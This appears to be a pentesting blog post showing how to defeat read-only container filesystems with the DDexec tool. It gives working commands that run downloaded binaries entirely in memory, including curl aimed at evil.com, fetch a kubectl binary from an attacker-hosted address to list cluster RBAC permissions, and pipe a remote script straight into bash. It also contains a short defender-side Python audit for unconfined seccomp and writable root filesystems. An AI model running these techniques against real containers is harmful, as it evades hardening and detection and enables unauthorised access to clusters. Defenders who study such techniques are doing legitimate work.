Bypassing read-only filesystem (ro) restrictions in containers - in-memory execution
Hi reader! I am sure you might have encountered a container with a read-only filesystem while pentesting and felt stuck, as you can't transfer files or run your custom programs...
Today we will look at what we can try if we ever land in such a container.
Prerequisites (copied from https://github.com/arget13/DDexec):
1. These programs should be available in the container image:
   bash | zsh | ash (busybox)
   setarch | linux64 (busybox)
2. The personality() syscall must be allowed, which is blocked in the default Docker seccomp profile. Therefore, for this demo, the container is run without any seccomp profile.
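As an added defender-side check that is not part of the original post or of the DDexec project: a small Python audit over `docker inspect` output that flags containers lacking exactly the two controls named above (a seccomp filter in place and a read-only rootfs). The container names and values are constructed sample data.

```python
import json

# Constructed sample: trimmed `docker inspect` output for three containers.
# Only the HostConfig fields the check reads are included.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/ro-unconfined",
     "HostConfig": {"ReadonlyRootfs": True,
                    "SecurityOpt": ["seccomp=unconfined"]}},
    {"Name": "/ro-default",
     "HostConfig": {"ReadonlyRootfs": True, "SecurityOpt": None}},
    {"Name": "/rw-default",
     "HostConfig": {"ReadonlyRootfs": False, "SecurityOpt": []}},
])


def seccomp_disabled(host_config):
    """True when the container runs with no seccomp filter at all.
    Docker records this as the literal option 'seccomp=unconfined'."""
    opts = host_config.get("SecurityOpt") or []
    return any(o.strip().lower() == "seccomp=unconfined" for o in opts)


def audit(inspect_json):
    """Return {container_name: [findings]} for a `docker inspect` dump.
    A read-only rootfs only holds as a control while the default seccomp
    profile (which blocks personality()) is in place; without it, the
    in-memory execution described above defeats the restriction."""
    findings = {}
    for container in json.loads(inspect_json):
        hc = container.get("HostConfig", {})
        issues = []
        if seccomp_disabled(hc):
            issues.append("seccomp=unconfined: default-blocked syscalls "
                          "such as personality() are reachable")
        if not hc.get("ReadonlyRootfs", False):
            issues.append("rootfs is writable: --read-only not set")
        if issues:
            findings[container["Name"].lstrip("/")] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_INSPECT).items():
        for issue in issues:
            print(f"{name}: {issue}")
```

On a real host, feed it the output of `docker inspect $(docker ps -q)` instead of the constructed sample.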
Let's see the in-memory execution now:
a) Run a test container
We will be using the ubuntu image with tag latest from Docker Hub:
docker run --security-opt seccomp=unconfined --read-only -it ubuntu
b) For this example, we want to run curl, which is not available inside the container, and we first verify that we don't have permission to write any file to the container filesystem.
c) Downloading the static curl binary and converting it to a base64 string:
wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curl
base64 -w0 ./curl > curl.b64
d) Creating a shell function named ddexec (this step can be skipped if curl is present):
# Copy and paste the ddexec.sh script as it is.
e) Running the base64-encoded binary using ddexec:
echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
Our DNS resolver is not configured, which is why curl was unable to resolve evil.com :)
If curl is already present in the container, we can host the base64-encoded binary file and just run the command below:
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | ddexec /bin/kubectl auth can-i --list
Here we are listing RBAC permissions in memory without touching the disk.
We can also skip creating the ddexec function entirely by fetching ddexec.sh with process substitution:
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(curl -sk https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list